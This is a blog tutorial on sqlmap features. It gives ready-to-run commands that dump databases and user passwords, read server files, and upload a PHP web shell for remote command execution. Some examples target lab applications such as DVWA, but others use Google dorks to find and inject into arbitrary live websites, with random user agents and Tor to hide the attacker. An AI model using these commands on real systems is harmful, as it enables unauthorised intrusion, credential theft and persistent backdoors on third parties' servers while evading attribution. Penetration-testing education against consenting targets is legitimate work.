Hey folks, we have again come up with another topic which is related to sqlmap tool. As you may have seen our previous article in which we have described the complete steps to dump web application’s database with the help of sqlmap and I think you should revisit that article for better understanding. But in this article we will tell you all the valuable features of this tool. We think you are already familiar with the SQL injection vulnerability, so we should move directly to the topic.
Lets take a look 🙂 !!
In our previous article, we have described how we can detect a web application SQL injection vulnerability through google dork. But we will use the following web application which is specially made for penetration testing purposes. Simply we add a single quote after the “cat=” parameter and we got MySQL syntax error which means the web application is vulnerable to the SQL injection vulnerability.
We have already given you a brief introduction about this tool like how we dump databases, tables and columns etc, but if you want to learn in deep then revisit our previous article. Now we’ll dump the database by using the following command.
Usage 🙂 !! sqlmap -u “<URL>>” –dbs
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
Nice 🙂 !! As you can see, we have got all the names of the database which are present in the web application.
The following command is used to dump all tables of a particular database. Just add another feature to the command and execute it.
Usage 🙂 !! sqlmap -u “<URL>>” -D < database name > –dump-all –batch
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --dump-all --batch
Done 🙂 !! The result is in front of you and you can see that it has dumped all the tables in the “acurate” database at once.
Sometimes we log into the website to find the SQL injection bug in the web application and in that case we have to provide “cookies” in sqlmap to exploit the vulnerability otherwise it will not be able to detect the vulnerability. We are using “DVWA” vulnerable web application to show these feature of this tool. After entering any random numeric string it gives us the details of the users which means web application is vulnerable to SQL injection vulnerability. Let’s exploit 🙂 !!
Let’s boot up your burpsuite tool because it will play an important role to get the cookies of the current user. Now first intercept the request and copy the entire highlighted text such as shown in below image.
Go back to the terminal and just add the URL, add the cookie with the copy text and execute the command with the database.
Usage 🙂 !! sqlmap -u “<URL>>” –cookie < cookies > –dbs
sqlmap -u "http://192.168.1.13/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=13o5hlkjs3hur2pvnfkgim9t74" --dbs
Nice 🙂 !! As you can see it has dumped all the databases after meeting the requirements of this tool.
HTTP Request File
Through this features we will try to dump the entire database through the HTTP response file. First we will intercept the request, save it in a text file and try to detect and exploit the vulnerability with the sqlmap tool.
After copying the HTTP request, include it in a text file using any tool.
Check the below command which contains the file that we created ourselves and also gave the command to dump the database.
Usage 🙂 !! sqlmap -r < HTTP file > –dbs –dump-all –batch
sqlmap -r secnhack --dbs --dump-all --batch
Done 🙂 !! After executing the command as you can see it has dumped all the databases which are present in the web application.
We do not need to execute dork separately on Google as it is an in-built future in sqlmap tool. All we need to do is to add “G” option with our dork and it will automatically find the website related to dork and also ask us that do you want to perform sql injection on it or not ?.
sqlmap -g "inurl:".php?cat="" --dbs
Nice 🙂 !! After selecting the Yes option, it tries to detect the SQL injection vulnerability in the web application and dumped the database if they are vulnerable to SQL injection vulnerability.
Automatically change the user agent after specified period of time to a randomly selected one, thus hiding your real user agent. This will help us in making ourselves anonymous.
sqlmap -g "inurl:".php?cat="" --dbs --random-agent
The level defines : the number of payload that would be performed, whereas the risk are recommended to be increased if SQLMap is not able to detect the injection. By default both work at level 1 but you can increase the level from 1 to 5 and risk from 1 to 3.
sqlmap -r secnhack --dbs --risk=3 --level=5
Great 🙂 !! After increasing both the level and the risk, it completely dumps all the databases that exist in the web application.
Now if you want to dump all the databases, their tables and columns at once, you can add the “all” option to your command.
sqlmap -r secnhack --all
That’s Nice 🙂 !! As you can see, even this has dumped the passwords of the users which are stored in the database.
We can get the current version of the database running on the remote host machine by adding “B” option to our command.
sqlmap -r secnhack -b
Nice 🙂 !! Finally it has given us the details of the database running on remote host.
These are some important features through which we can extract some useful information from the database. Execute the command below to extract the users available in the web application.
sqlmap -r secnhack --current-user
Let us consider the image below in which we have successfully dumped the current available database into a web application.
sqlmap -r secnhack --current-db
If you only want to get the passwords of the users available in the web application, you can add the “password” option to your command.
sqlmap -r secnhack --passwords
Sqlmap provides tor service to make us completely anonymous. However, you can take advantage of this service when you have pre-installed tor in your linux machine.
sqlmap -r secnhack --tor
We can perform multiple scans at once time in this tool. But let’s see how it’s possible ? !! So first we will create a file which contains all the URLs that we want to use.
Then we will add the location option of the created file by adding “m” option and try to dump the database.
sqlmap -m websites.txt --dbs
Nice 🙂 !! We finally got the database name of the first web application.
Done 🙂 !! Similarly, we can take help of this facility which will definitely help in saving our time.
As we know that privileges means what the user is allowed to do and we can check it by following command.
sqlmap -r secnhack --privileges
Hmm 🙂 !! As you can see what privileges are available to shubham user.
Through the following features we can read the sensitive files present in the web application if we have the information of the root folder of the web application.
Usage 🙂 !! sqlmap -r < HTTP File > –file-read=< Location >
sqlmap -r /root/secnhack --file-read=/var/www/html/users.txt
Great 🙂 !! As you can see we have received the sensitive user file without entering the remote host’s database properly.
Now we will show you how we can upload any of our malicious php files and acquire the entire web server through the sqlmap tool. First of all create a malicious php file according to yourself, in our case we will use the following PHP code which is sufficient to get the cmd shell of the target web server.
'<?php system($_GET['c']); ?>'
Let’s understand the below command, see “–file-write” option in which we have placed our malicious PHP file and see “–file-dest” option in which we add the path of the web server where we are on the target web server Want to upload your php file.
Usage 🙂 !! sqlmap -r < HTTP File > –file-write < Your File > –file-dest < Upload Location > –dbs
sqlmap -r /root/secnhack --file-write=/root/hack.php --file-dest=/var/www/html/DVWA/vulnerabilities/sqli/hack.php --batch
OMG 🙂 !! Finally our malicious PHP file is successfully uploaded to the target web server and now we can access the web application server’s database through the browser and execute arbitrary commands.
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.